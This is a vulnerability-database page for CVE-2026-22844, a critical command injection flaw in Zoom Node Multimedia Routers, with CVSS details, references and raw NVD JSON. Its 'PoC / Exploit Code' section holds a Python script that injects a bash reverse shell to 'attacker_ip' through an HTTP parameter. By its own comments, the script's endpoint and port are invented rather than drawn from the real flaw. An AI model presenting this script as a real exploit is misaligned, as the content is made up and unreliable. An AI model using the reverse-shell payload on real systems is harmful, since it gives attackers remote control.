CVE-2026-22844

Description

A Command Injection vulnerability in Zoom Node Multimedia Routers (MMRs) before version 5.2.1716.0 may allow a meeting participant to conduct remote code execution of the MMR via network access.

CVSS Details

CVSS Score

9.9

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Zoom Node MMR < 5.2.1716.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-22844 PoC - Zoom MMR Command Injection
# Note: This is a conceptual PoC for educational purposes only

import socket
import struct

def send_exploit(target_ip, target_port, command):
    """
    Send command injection payload to Zoom MMR
    """
    # Construct malicious payload
    # In real attack, attacker would identify the vulnerable endpoint
    payload = f";{command};"
    
    # Example: Send crafted network request
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((target_ip, target_port))
    
    # Malicious request with command injection
    exploit_request = f"GET /api/mmr?cmd={payload} HTTP/1.1\r\n"
    exploit_request += f"Host: {target_ip}\r\n\r\n"
    
    sock.send(exploit_request.encode())
    response = sock.recv(4096)
    sock.close()
    return response

def main():
    target = "<target_ip>"
    port = 8800  # Example port
    
    # Example: Execute reverse shell command
    cmd = "bash -i >& /dev/tcp/attacker_ip/4444 0>&1"
    
    print(f"[*] Sending exploit to {target}:{port}")
    result = send_exploit(target, port, cmd)
    print(f"[*] Response received: {result}")

if __name__ == "__main__":
    main()

# Note: Actual PoC requires knowledge of specific vulnerable endpoint
# Refer to Zoom Security Bulletin ZSB-26001 for official guidance

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22844
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22844
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22844/
[4] VulDB https://vuldb.com/cve/CVE-2026-22844
[5] https://www.zoom.com/en/trust/security-bulletin/zsb-26001

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22844", "sourceIdentifier": "[email protected]", "published": "2026-01-20T14:16:21.980", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Command Injection vulnerability in Zoom Node Multimedia Routers (MMRs) before version 5.2.1716.0 may allow a meeting participant to conduct remote code execution of the MMR via network access."}, {"lang": "es", "value": "Una vulnerabilidad de inyección de comandos en los Routers Multimedia (MMR) de Zoom Node anteriores a la versión 5.2.1716.0 podría permitir a un participante de la reunión realizar la ejecución remota de código del MMR a través del acceso a la red."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://www.zoom.com/en/trust/security-bulletin/zsb-26001", "source": "[email protected]"}]}}